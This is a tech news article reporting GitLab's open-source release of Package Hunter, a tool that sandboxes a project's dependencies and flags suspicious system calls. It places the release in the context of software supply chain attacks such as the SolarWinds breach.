Skip to main content

GitLab’s open source Package Hunter detects malicious code in dependencies

GitLab package hunter
GitLab package hunter
Image Credit: GitLab

Join us in Atlanta on April 10th and explore the landscape of security workforce. We will explore the vision, benefits, and use cases of AI for security teams. Request an invite here.


Let the OSS Enterprise newsletter guide your open source journey! Sign up here.

GitLab recently launched a new open source tool to detect malicious code in software components.

Modern software depends on dozens or hundreds of third-party packages, some which may not be actively maintained or monitored for vulnerabilities. Package Hunter, which integrates directly with GitLab’s continuous integration (CI) platform, runs a project’s dependencies in a siloed testing environment known as a sandbox and leverages “dynamic behavior analysis” to spot malicious packages that attempt to extract sensitive data or otherwise run unintended code.

“Any suspicious system calls are reported to the user for further examination,” GitLab security researcher Dennis Appelt wrote in a blog post.

VB Event

The AI Impact Tour – Atlanta

Continuing our tour, we’re headed to Atlanta for the AI Impact Tour stop on April 10th. This exclusive, invite-only event, in partnership with Microsoft, will feature discussions on how generative AI is transforming the security workforce. Space is limited, so request an invite today.
Request an invite

Pros and cons

While the benefits of open source software are well understood, the vast majority of codebases contain at least one known open source vulnerability, according to a recent Synopsys report. Another report also concluded that more often that not, developers don’t bother updating third-party libraries they use in their software.

But the growing scourge of supply chain attacks, which target businesses by exploiting vulnerabilities in “trusted” third-party hardware and software, has seemingly accelerated industry efforts to bolster defenses against threats like those that emerged in the high-profile infiltration of IT infrastructure company SolarWinds. That attack opened access to sensitive data at thousands of organizations, from Microsoft to government agencies.

Google recently introduced a new end-to-end framework for “ensuring the integrity of software artifacts throughout the software supply chain,” which is essentially certification levels that verify what security processes a particular open source software package has in place. The internet giant also launched the Open Source Vulnerabilities database to improve vulnerability triage for developers.

GitLab quietly announced Package Hunter back in December and has been running the prototype internally since. But as of July 23, the company has made it available under a permissive MIT license for anyone to use.

VB Daily - get the latest in your inbox

Thanks for subscribing. Check out more VB newsletters here.

An error occured.